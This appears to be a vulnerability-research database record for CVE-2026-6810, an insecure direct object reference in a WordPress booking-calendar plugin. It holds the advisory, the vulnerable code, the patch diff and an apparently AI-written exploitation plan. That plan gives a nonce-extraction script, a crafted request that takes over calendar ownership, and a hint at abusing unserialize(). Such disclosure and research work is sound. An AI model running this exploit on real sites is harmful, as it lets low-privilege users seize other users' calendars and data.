[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3ICyD79fsYRi6_4fjlKctCh8ztHJSfdiDE69bdDMqes":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-6810","booking-calendar-contact-form-authenticated-subscriber-insecure-direct-object-reference-to-calendar-takeover","Booking Calendar Contact Form \u003C= 1.2.63 - Authenticated (Subscriber+) Insecure Direct Object Reference to Calendar Takeover","The Booking Calendar Contact Form plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2.63 via the dex_bccf_admin_int_calendar_list.inc.php file due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to takeover other user's calendars and view user data associated with the calendar.","booking-calendar-contact-form",null,"\u003C=1.2.63","1.2.64","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-04-23 16:30:20","2026-04-24 05:29:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa3977d10-239d-4b83-ab0c-ad165485498d?source=api-prod",1,[22,23,24],"README.txt","dex_bccf.php","dex_bccf_admin_int_calendar_list.inc.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-6810\n\n## 1. Vulnerability Summary\nThe **Booking Calendar Contact Form** plugin (\u003C= 1.2.63) is vulnerable to an **Insecure Direct Object Reference (IDOR)** in the administrative interface. The file `dex_bccf_admin_int_calendar_list.inc.php` processes calendar update requests without performing any capability checks (e.g., `current_user_can()`). It only verifies a WordPress nonce (`uname_bccf`). Because the admin page associated with this file is often accessible to low-privilege users (Subscriber+) or the logic runs early in the admin lifecycle, an authenticated attacker can modify the `conwer` (owner) field of any calendar ID, effectively taking over ownership of calendars belonging to other users, including administrators.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin.php?page=dex_bccf.php`\n* **Method:** `GET`\n* **Vulnerable Parameters:**\n * `u`: The ID of the target calendar to take over (Insecure Direct Object Reference).\n * `owner`: The User ID to which ownership should be transferred (the attacker's ID).\n * `name`: The new name for the calendar.\n * `public`: Value for the `caldeleted` field (typically `1`).\n* **Authentication:** Required (Subscriber-level access or higher).\n* **Preconditions:** The attacker must obtain a valid nonce for the `uname_bccf` action.\n\n## 3. Code Flow\n1. A user accesses `admin.php?page=dex_bccf.php`.\n2. The plugin loads `dex_bccf.php`, which includes `dex_bccf_admin_int_calendar_list.inc.php`.\n3. `dex_bccf_admin_int_calendar_list.inc.php` checks for `$_GET['u']` (Line 31).\n4. It performs a nonce verification: `wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' )` (Line 33).\n5. **Critically**, it skips any capability checks.\n6. It executes a prepared SQL statement (Lines 37-38):\n ```php\n $wpdb->query( $wpdb->prepare( \n 'UPDATE `'.DEX_BCCF_CONFIG_TABLE_NAME.'` SET conwer=%d,`'.TDE_BCCFCALDELETED_FIELD.'`=%d,`'.TDE_BCCFCONFIG_USER.'`=%s WHERE `'.TDE_BCCFCONFIG_ID.'`=%d', \n sanitize_text_field($_GET[\"owner\"]), \n sanitize_text_field($_GET[\"public\"]), \n sanitize_text_field($_GET[\"name\"]), \n $_GET['u'] \n ) );\n ```\n7. `DEX_BCCF_CONFIG_TABLE_NAME` resolves to `{prefix}bccf_reservation_calendars`.\n8. `conwer` is the column storing the owner's User ID. By providing their own ID in `$_GET['owner']`, the attacker becomes the owner of calendar `$_GET['u']`.\n\n## 4. Nonce Acquisition Strategy\nThe nonce `uname_bccf` is required. It is generated within `dex_bccf_admin_int_calendar_list.inc.php` and embedded in the page source for administrative functions.\n\n1. **Identify Access:** Low-privilege users (Subscribers) can typically access `admin.php?page=dex_bccf.php` if the plugin registers the menu with the `read` capability or fails to restrict the sub-include.\n2. **Navigation:** Use `browser_navigate` to go to `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin.php?page=dex_bccf.php`.\n3. **Extraction:** The nonce is stored in a PHP variable `$nonce_un` and used in JavaScript functions within the page.\n4. **Execution:** Use `browser_eval` to find the nonce in the URL of the \"Update\" links or the `cp_updateItem` function logic.\n * The source shows the nonce is echoed directly into the `document.location` in the `cp_updateItem` JS function:\n `'admin.php?page=dex_bccf.php&_wpnonce=\u003C?php echo $nonce_un; ?>&u='+id...`\n * Command: `browser_eval(\"document.documentElement.innerHTML.match(\u002F_wpnonce=([a-f0-9]{10})\u002F)[1]\")`\n\n## 5. Exploitation Strategy\n### Step 1: Discover Target Calendar ID\nAs an administrator, create a calendar. Note its ID (e.g., `1`).\n\n### Step 2: Authenticate as Subscriber\nLog in as a Subscriber-level user.\n\n### Step 3: Obtain Nonce\nNavigate to the plugin's admin page and extract the `uname_bccf` nonce.\n\n### Step 4: Execute Takeover Request\nPerform a GET request to `admin.php` with the attacker's `id` as the `owner`.\n\n* **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin.php`\n* **Query Parameters:**\n * `page`: `dex_bccf.php`\n * `u`: `1` (Target Calendar ID)\n * `owner`: `2` (Attacker Subscriber ID)\n * `name`: `Takeover`\n * `public`: `1`\n * `_wpnonce`: `[EXTRACTED_NONCE]`\n\n**Request Example (using `http_request`):**\n```json\n{\n \"method\": \"GET\",\n \"url\": \"http:\u002F\u002Fvulnerable-hostname\u002Fwp-admin\u002Fadmin.php?page=dex_bccf.php&u=1&owner=2&name=Hacked&public=1&_wpnonce=a1b2c3d4e5\"\n}\n```\n\n## 6. Test Data Setup\n1. **Admin User:** Create an admin user.\n2. **Subscriber User:** Create a subscriber user (ID 2).\n3. **Target Calendar:** As Admin, create at least one calendar.\n * `wp eval \"global \\$wpdb; \\$wpdb->insert(\\$wpdb->prefix . 'bccf_reservation_calendars', array('uname' => 'Admin Calendar', 'conwer' => 1, 'caldeleted' => 1));\"`\n4. **Confirm ID:** Verify the calendar exists and is owned by ID 1.\n * `wp db query \"SELECT id, uname, conwer FROM wp_bccf_reservation_calendars\"`\n\n## 7. Expected Results\n* The server should return a `200 OK` response.\n* The response body should contain the message: `\"Item updated\"` (quoted from line 39 of `dex_bccf_admin_int_calendar_list.inc.php`).\n* The database record for the calendar with ID `u` will now have `conwer = 2`.\n\n## 8. Verification Steps\n1. **Database Check:**\n ```bash\n wp db query \"SELECT id, uname, conwer FROM wp_bccf_reservation_calendars WHERE id=1\"\n ```\n Confirm `conwer` is now the Subscriber's ID.\n2. **UI Check:** Log in as the Subscriber. Navigate to `admin.php?page=dex_bccf.php`. The Subscriber should now see the \"Admin Calendar\" in their list, as the loop `if (cp_bccf_is_administrator() || ($current_user->ID == $item->conwer))` now evaluates to true for them.\n\n## 9. Alternative Approaches\nIf the `_wpnonce` extraction via `browser_eval` fails:\n* Check for the nonce in the \"Export\" button or other links in the `Calendar List` table.\n* If `admin.php?page=dex_bccf.php` is strictly blocked for Subscribers, check if the nonce can be obtained from the frontend if the plugin enqueues it there (less likely for this specific `uname_bccf` action).\n* Check if the `bccf_fileimport` POST action (Line 14) can be abused using the same nonce to overwrite calendar data via `unserialize()`.","The Booking Calendar Contact Form plugin (\u003C= 1.2.63) lacks authorization checks in its administration interface, allowing Subscriber-level users to update calendar settings and change ownership. By manipulating the 'u' and 'owner' parameters in a request to dex_bccf_admin_int_calendar_list.inc.php, an attacker can take over any calendar and access associated user data.","\u002F\u002F dex_bccf_admin_int_calendar_list.inc.php line 14\nif (isset($_POST[\"bccf_fileimport\"]) && $_POST[\"bccf_fileimport\"] == 1 && wp_verify_nonce( $_POST['_wpnonce'], 'uname_bccf' ))\n{ \n if (!wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' )) \n $message = \"Access verification error. Cannot update settings.\";\n else\n { \n $filename = sanitize_file_name($_FILES['cp_filename']['tmp_name']);\n $handle = fopen($filename, \"r\");\n $contents = fread($handle, filesize($filename));\n fclose($handle);\n $params = unserialize($contents);\n $wpdb->query( $wpdb->prepare( 'DELETE FROM `'.DEX_BCCF_CONFIG_TABLE_NAME.'` WHERE id=%d', $params['id'] ) ); \n unset($params[\"form_name\"]);\n $wpdb->insert( DEX_BCCF_CONFIG_TABLE_NAME, $params);\n @unlink($filename);\n $message = \"Backup loaded.\";\n }\n}\n\n---\n\n\u002F\u002F dex_bccf_admin_int_calendar_list.inc.php line 31\nelse if (isset($_GET['u']) && $_GET['u'] != '')\n{\n if (!wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' )) \n $message = \"Access verification error. Cannot update settings.\";\n else\n { \n $wpdb->query( $wpdb->prepare( 'UPDATE `'.DEX_BCCF_CONFIG_TABLE_NAME.'` SET conwer=%d,`'.TDE_BCCFCALDELETED_FIELD.'`=%d,`'.TDE_BCCFCONFIG_USER.'`=%s WHERE `'.TDE_BCCFCONFIG_ID.'`=%d', sanitize_text_field($_GET[\"owner\"]), sanitize_text_field($_GET[\"public\"]), sanitize_text_field($_GET[\"name\"]), $_GET['u'] ) ); \n $message = \"Item updated\"; \n } \n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking-calendar-contact-form\u002F1.2.63\u002Fdex_bccf_admin_int_calendar_list.inc.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking-calendar-contact-form\u002F1.2.64\u002Fdex_bccf_admin_int_calendar_list.inc.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking-calendar-contact-form\u002F1.2.63\u002Fdex_bccf_admin_int_calendar_list.inc.php\t2026-02-03 11:22:36.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking-calendar-contact-form\u002F1.2.64\u002Fdex_bccf_admin_int_calendar_list.inc.php\t2026-04-21 20:56:42.000000000 +0000\n@@ -11,7 +11,7 @@\n global $wpdb;\n $message = \"\";\n \n-if (isset($_POST[\"bccf_fileimport\"]) && $_POST[\"bccf_fileimport\"] == 1 && wp_verify_nonce( $_POST['_wpnonce'], 'uname_bccf' ))\n+if (current_user_can('manage_options') && isset($_POST[\"bccf_fileimport\"]) && $_POST[\"bccf_fileimport\"] == 1 && wp_verify_nonce( $_POST['_wpnonce'], 'uname_bccf' ))\n { \n if (!wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' )) \n $message = \"Access verification error. Cannot update settings.\";\n@@ -29,7 +29,7 @@\n $message = \"Backup loaded.\";\n }\n }\n-else if (isset($_GET['u']) && $_GET['u'] != '')\n+else if (current_user_can('manage_options') && isset($_GET['u']) && $_GET['u'] != '')\n {\n if (!wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' )) \n $message = \"Access verification error. Cannot update settings.\";\n@@ -39,7 +39,7 @@\n $message = \"Item updated\"; \n } \n }\n-else if (isset($_GET['ac']) && $_GET['ac'] == 'st')\n+else if (current_user_can('manage_options') && isset($_GET['ac']) && $_GET['ac'] == 'st')\n {\n if (!wp_verify_nonce( $_REQUEST['_wpnonce'], 'uname_bccf' )) \n $message = \"Access verification error. Cannot update settings.\";","The exploit requires an authenticated session with Subscriber-level privileges or higher. \n\n1. The attacker navigates to the plugin's administration page (\u002Fwp-admin\u002Fadmin.php?page=dex_bccf.php) to obtain a valid WordPress nonce for the 'uname_bccf' action, which is embedded in the page's HTML\u002FJavaScript.\n2. The attacker identifies the numeric ID of a target calendar they wish to control.\n3. The attacker issues a GET request to the administrative endpoint with several specific parameters: 'page=dex_bccf.php', 'u' (the target calendar ID), 'owner' (the attacker's own user ID), '_wpnonce' (the extracted nonce), and 'public=1'.\n4. The plugin's back-end logic processes this request without checking if the current user has the 'manage_options' capability, executing a SQL UPDATE statement that assigns ownership of the calendar to the attacker's user ID.\n5. Once successful, the attacker can view and manage the calendar through the standard plugin interface.","gemini-3-flash-preview","2026-04-27 13:37:51","2026-04-27 13:38:19",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.2.63","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-calendar-contact-form\u002Ftags\u002F1.2.63","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbooking-calendar-contact-form.1.2.63.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-calendar-contact-form\u002Ftags\u002F1.2.64","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbooking-calendar-contact-form.1.2.64.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-calendar-contact-form\u002Ftags"]